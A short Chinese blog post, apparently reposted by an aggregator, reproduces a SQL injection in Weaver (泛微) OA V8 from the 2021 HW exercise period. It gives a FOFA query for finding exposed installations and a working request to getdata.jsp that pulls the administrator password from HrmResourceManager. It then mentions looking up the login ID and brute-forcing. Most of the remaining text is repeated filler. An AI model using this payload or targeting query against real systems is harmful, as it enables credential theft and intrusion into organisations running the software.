泛微OA V8 SQL注入漏洞复现(2021HW)
Posted 不爱吃韭菜的韭菜
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了泛微OA V8 SQL注入漏洞复现(2021HW)相关的知识,希望对你有一定的参考价值。
fofa搜:app="Weaver-OA"
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select password as id from HrmResourceManager
网上找到的截图,哈哈哈,我说怎么猜不到username:
然后查 loginid:(没想到....早知道爆破一下的)
参考:
https://mp.weixin.qq.com/s/3tuDJyUWKS8yiLRsfvn2WQ
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数
以上是关于泛微OA V8 SQL注入漏洞复现(2021HW)的主要内容,如果未能解决你的问题,请参考以下文章
泛微e-cology OA系统某接口存在数据库配置信息泄露漏洞复现